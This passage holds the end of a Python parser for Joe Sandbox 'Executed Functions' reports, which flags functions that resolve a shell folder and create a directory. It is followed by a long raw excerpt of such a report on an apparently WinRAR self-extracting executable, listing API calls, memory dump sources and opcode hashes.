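SHELL_FOLDER_APIS = {"SHGetSpecialFolderLocation", "SHGetSpecialFolderPathW",
                     "SHGetFolderPathW", "SHGetKnownFolderPath"}
DIR_CREATE_APIS = {"CreateDirectoryW", "CreateDirectoryA"}


@dataclass
class FunctionRecord:
    apis: list = field(default_factory=list)   # (name, module, ref address)
    meta: dict = field(default_factory=dict)   # label -> value

    @property
    def api_names(self) -> set:
        return {name for name, _, _ in self.apis}


def parse_records(text: str) -> list:
    """Split report text into FunctionRecords. A trailing record with no
    'Uniqueness Score' line (page cut off mid-record) is still returned."""
    records, cur = [], FunctionRecord()
    for raw in text.splitlines():
        line = raw.strip()
        if line.startswith("Uniqueness Score"):
            cur.meta["Uniqueness Score"] = line.split(":", 1)[1].strip()
            records.append(cur)
            cur = FunctionRecord()
            continue
        m = API_LINE.match(line)
        if m:
            cur.apis.append((m.group(1), m.group(2), m.group(3)))
            continue
        m = META_LINE.match(line)
        if m:
            cur.meta[m.group(1).strip()] = m.group(2).strip()
    if cur.apis or cur.meta:
        records.append(cur)
    return records


def writes_under_shell_folder(rec: FunctionRecord) -> bool:
    """True when the function both resolves a shell folder and creates a directory."""
    names = rec.api_names
    return bool(names & SHELL_FOLDER_APIS) and bool(names & DIR_CREATE_APIS)


def index_by(records, label: str) -> dict:
    """Group records by a Similarity field ('API String ID', 'Opcode ID', ...)
    so the same function can be matched across reports."""
    groups = {}
    for rec in records:
        groups.setdefault(rec.meta.get(label, ""), []).append(rec)
    return groups


# Constructed sample: two records abbreviated from this page.
SAMPLE = """\
APIs
• SHGetMalloc.SHELL32(?,00000800), ref: 00007FF7D79F40C4
• SHGetSpecialFolderLocation.SHELL32(?,?,?,?,00000800), ref: 00007FF7D79F40DF
• SHGetPathFromIDListW.SHELL32 ref: 00007FF7D79F40F1
  • Part of subcall function 00007FF7D79E3458: CreateDirectoryW.KERNEL32(00000800,00000000), ref: 00007FF7D79E34A0
  • Part of subcall function 00007FF7D79E3458: CreateDirectoryW.KERNEL32(00000800,00000000), ref: 00007FF7D79E34D5
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Similarity
• API ID: CreateDirectory$FolderFromListLocationMallocPathSpecial
• String ID: WinRAR
• API String ID: 977838571-3970807970
• Opcode ID: 415bfa020dc0990cad3e0501dba2d99d0bb0d0c3ec71343b5049903f98ccb042
Uniqueness Score: -1.00%
APIs
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
• Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
Uniqueness Score: -1.00%
"""

if __name__ == "__main__":
    for rec in parse_records(SAMPLE):
        flag = "shell-folder write" if writes_under_shell_folder(rec) else ""
        print(rec.meta.get("API String ID"), sorted(rec.api_names), flag)
```

Feed it the text of a whole "Executed Functions" section and index the result by Opcode ID or API String ID; records whose IDs recur across unrelated samples are almost always packer, SFX or runtime code, and the ones left over are where the sample-specific behaviour lives.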

Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: ErrorLast$FileHandleRead
• String ID:
• API String ID: 2244327787-0
• Opcode ID: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
• Instruction ID: 5c6e8107cf57fbdd852fa8d08f62732f3d03d2983045eb457803998451217b45
• Opcode Fuzzy Hash: 3b78d4ed6aa6b5a120351a24eca7d2297273107fe5a6a7e720e5693830f3c1e4
• Instruction Fuzzy Hash: 7821AE22E4D54782EB64AB25E00037EE3A1BB45B98FD00133EA5D876C4CF2CD8C2C721
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: ChangeCloseFindNotificationReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
• String ID:
• API String ID: 1093378488-0
• Opcode ID: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
• Instruction ID: 83c96004c6475513ca27efaee4bb749b22810367243f3ac4c336cfd6b29727bc
• Opcode Fuzzy Hash: 8563909dc3f60491a00452f33658f3f2e850a11d725ac5753c43192e2d1258eb
• Instruction Fuzzy Hash: 38117332514A5197E218AF64EA4495EA321F7C6791FC00232DB6D132A5CF39E476C714
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID:
• String ID: AFUM$default.sfx
• API String ID: 0-2491287583
• Opcode ID: 5c58a6b02527a807887d7dd99d9e895900dd773c01640ccf4200c385e9f96f03
• Instruction ID: 3402a358f806032dd317e64fe0458eef12814aeee4f4e931acdad4705e302ae6
• Opcode Fuzzy Hash: 5c58a6b02527a807887d7dd99d9e895900dd773c01640ccf4200c385e9f96f03
• Instruction Fuzzy Hash: C6819623A0C68340EA74BB2195942FDA290AF5179DFC84033DE8D076E6DF6DA497C770
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: FileHandleType
• String ID: @
• API String ID: 3000768030-2766056989
• Opcode ID: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
• Instruction ID: 0110971a1f9120a7f85a1dbf3f040d2108e281a5072bd64f151b2282e0b5bf9d
• Opcode Fuzzy Hash: ac2df8724446a0d51fe7f393cd596ff3ce055ba98acd5cb21c7dcdd1beef0449
• Instruction Fuzzy Hash: 8221F622A0974240EB6C9B2C949053DA661EBC5730FE42337DA6E16BD4CE3CD482C316
Uniqueness

Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Threadwcschr$CreateExceptionPriorityThrow
                                                                                                                                                                      • String ID: CreateThread failed
                                                                                                                                                                      • API String ID: 1217111108-3849766595
                                                                                                                                                                      • Opcode ID: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                      • Instruction ID: 7f870e6499170f3bf06398985ebd07c36b43224895bc068e7101a61ad943c281
                                                                                                                                                                      • Opcode Fuzzy Hash: 23f25dd9d767684a47335cfb6564c8d2137849cd663ca384977e916ef4a87e16
                                                                                                                                                                      • Instruction Fuzzy Hash: F4116032A08A4292E709FF28E8805AEB760FBC4785FD44433E64D12659DF3CE557C710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CriticalSection$EnterEventLeave
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3094578987-0
                                                                                                                                                                      • Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                      • Instruction ID: 0319433d52a5aa43dcb60dc516b0fba771a2f96da18f539c91fd24a7ca0a2eca
                                                                                                                                                                      • Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
                                                                                                                                                                      • Instruction Fuzzy Hash: 79F0D622608B4283DA28AF29FA5047DA361FFC9B99FC40133DE9D0726DCF2CD5068B10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process$CurrentExitTerminate
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1703294689-0
                                                                                                                                                                      • Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                      • Instruction ID: fa7e274c142eb2a248cd6275ca97334d12356e0827bd860160cc737ac197ea45
                                                                                                                                                                      • Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
                                                                                                                                                                      • Instruction Fuzzy Hash: 67E01A20A0871542EA4CBF689981B7E63526FD4741FC1643ACC0E563D2CE3DA40A8260
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ConsoleFileHandleModeType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4141822043-0
                                                                                                                                                                      • Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                      • Instruction ID: 028b383344c0250b178ffba30e06344ac8e8f5060c1e5c0e146f6d71644acd4b
                                                                                                                                                                      • Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
                                                                                                                                                                      • Instruction Fuzzy Hash: D0E0C224F0460353FF5C6BA5A8AA17E8252DF99B84FC41036E80F4A350EE2CD4878320
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CharEnvironmentExpandStrings
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4052775200-0
                                                                                                                                                                      • Opcode ID: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                                                                                                                                      • Instruction ID: 70a2b85c0d89390081601672b45f906432ae97c767158177fc7ebc489bff6024
                                                                                                                                                                      • Opcode Fuzzy Hash: d3cf55b71ff3c281346cb4b18b9965101663fbf2bf251821757e6ab4d6f75e53
                                                                                                                                                                      • Instruction Fuzzy Hash: C6E1A023A1D68385EB20AB64D4401BDE7A1FB91798FD44132EB9D07AE9DF7CE442C710
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF7D79D7EBE,00000000,00000000,00000000,00000000,00000007,00007FF7D79D7C48), ref: 00007FF7D79E1B8D
                                                                                                                                                                      • CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF7D79D7EBE,00000000,00000000,00000000,00000000,00000007,00007FF7D79D7C48), ref: 00007FF7D79E1BD7
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      • Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      • Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                      • Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                      • Instruction ID: edd244cf37fb1e6326275198a7f725cff180c4e287c649bf4f8bf1158e749677
                                                                                                                                                                      • Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
                                                                                                                                                                      • Instruction Fuzzy Hash: E1312663A1864646F770AF24D4053ADA6A0EB81B7CFD44336DEAC066C9DF7CC4868720
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: c49ac57705657b9ad02248bfdb67f7e8506d1d3ae62ca3e52d0cb80bbf31b64f
• Instruction ID: 5d2d24e50a7982c5482fb2619ac10098b193424e6d642ee79b3c96b856b36e74
• Opcode Fuzzy Hash: c49ac57705657b9ad02248bfdb67f7e8506d1d3ae62ca3e52d0cb80bbf31b64f
• Instruction Fuzzy Hash: 6A11E932509B8241EA04FB64A5403ADF2A4EF85794FD80236DA9D073E6DE3CD012C320
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
• Instruction ID: 98a511f7247bfd1cdffaa201d319a21fdbdc3e0c3c3b9a25464974a426ce1564
• Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
• Instruction Fuzzy Hash: F401EC22A1EA5341EA64AB25A50046DE361EF54BE4FE45232DA2D43BD5CE3CD4428710
Uniqueness
• Uniqueness Score: -1.00%

APIs
• setbuf.LIBCMT ref: 00007FF7D79D7A7B
  • Part of subcall function 00007FF7D7A22AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D7A27EF3
• setbuf.LIBCMT ref: 00007FF7D79D7A8F
  • Part of subcall function 00007FF7D79D7B44: GetStdHandle.KERNEL32(?,?,?,00007FF7D79D7A9E), ref: 00007FF7D79D7B4A
  • Part of subcall function 00007FF7D79D7B44: GetFileType.KERNELBASE(?,?,?,00007FF7D79D7A9E), ref: 00007FF7D79D7B56
  • Part of subcall function 00007FF7D79D7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF7D79D7A9E), ref: 00007FF7D79D7B69
  • Part of subcall function 00007FF7D7A22ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D7A22AD0
  • Part of subcall function 00007FF7D7A22B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7D7A22C1C
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
• String ID:
• API String ID: 4044681568-0
• Opcode ID: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
• Instruction ID: 25ee249e61c2358ca0f066b728a5248e3b75d78070e6eb0949ff0877df908e94
• Opcode Fuzzy Hash: 4e01616fa307debef67f3bdae5e4254b32b96fa30cb3d95000aeda74735f0c5a
• Instruction Fuzzy Hash: 9901D301E0918306FA5CB3B954A6BBD94429FE1318FC6A17BE51D6A2E3CD1D68038771
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
• Instruction ID: c8a8c21621af319bd6c7035f456da1f03a0bbac1006974ff230f3b6ddc975884
• Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
• Instruction Fuzzy Hash: 91018E22A08A4392EB68BB29E48466DA760EB8077CFD44333D13D011E5EF3CD587C720
Uniqueness
• Uniqueness Score: -1.00%

APIs
• GetFileAttributesW.KERNELBASE(00000800,00007FF7D79E305D,?,?,?,?,?,?,?,?,00007FF7D79F4126,?,?,?,?,00000800), ref: 00007FF7D79E30F0
• GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF7D79F4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF7D79E3119
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AttributesFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3188754299-0
                                                                                                                                                                      • Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                      • Instruction ID: 07cdb33dfe66a06e64adecbccaa2a8ecc7010dc63e2c5b29e7aef97c4d03ab78
                                                                                                                                                                      • Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
                                                                                                                                                                      • Instruction Fuzzy Hash: 05F0A421B1868142EA60EB69F4553ADA260BB8C7D8FC00132ED9C83795DE6CD5864B10
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A4A000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A54000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A5E000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919833509.00007FF7D7A66000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919941049.00007FF7D7A68000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919968604.00007FF7D7A6E000.00000002.00000001.01000000.0000001B.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_89_2_7ff7d79c0000_rar.jbxd
Similarity
• API ID: DirectoryLibraryLoadSystem
• String ID:
• API String ID: 1175261203-0
• Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
• Instruction ID: 1630b942060521cbabe1f4597f19e3781575156d8458157ad112af292a69e4ed
• Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
• Instruction Fuzzy Hash: 7EF01821B1858146F674AB64E8557FEA254BFD8784FC04433E9CD82659EE2CD2468720
Uniqueness
• Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000059.00000002.1919677451.00007FF7D79C1000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FF7D79C0000, based on PE: true
• Associated: 00000059.00000002.1919640269.00007FF7D79C0000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919745939.00007FF7D7A30000.00000002.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919779754.00007FF7D7A48000.00000004.00000001.01000000.0000001B.sdmp
• Associated: 00000059.00000002.1919807229.00007FF7D7A49000.00000008.00000001.01000000.0000001B.sdmp
